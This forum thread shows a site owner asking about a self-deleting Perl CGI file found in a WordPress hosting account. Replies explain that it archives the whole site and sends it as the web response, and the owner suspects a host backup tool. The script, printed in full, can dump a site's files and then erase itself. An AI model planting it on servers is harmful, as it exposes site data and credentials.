Weird file appeared in hosting. Anyone know what it is?

mat · Dec 19, 2016

Hi,

Hoping that some of you can confirm if this is a normal file or anything malicious? I don't want to take any chances. The website is Wordpress based.

In public_html a file appeared just over a week ago.

Name: ftpd0pFi5.cgi

Code inside:

#!/usr/bin/perl
use strict;
use warnings;

print "Content-Type: text/html\n\n";

unlink $0;
my $root = $ENV{DOCUMENT_ROOT_REAL};

chdir $root;
exec 'tar', 'c', '../.';

Thanks.

TallBloke · Dec 19, 2016

Don't know what that is.

tar is a file archive utility ...so has a backup plugin been installed recently or failed??

davedevelopment · Dec 19, 2016

I'd say that was malicious, the `exec 'tar', 'c', '../.'` is effectively "drop down a directory, zip everything up and send that as the response to the web request".

The `unlink $0` will remove the file(ftpd0pFi5.cgi) as soon as it has been run.

mat · Dec 19, 2016

Thanks for the help,

Regarding what you said TallBloke and the description of what is being run from Dave, this sounds like it could be my hosts full site backup utility. I do actualy remember it failing around the time as I was trying to get a backup to my desktop.

I will keep the file deleted.

Thanks,

Mat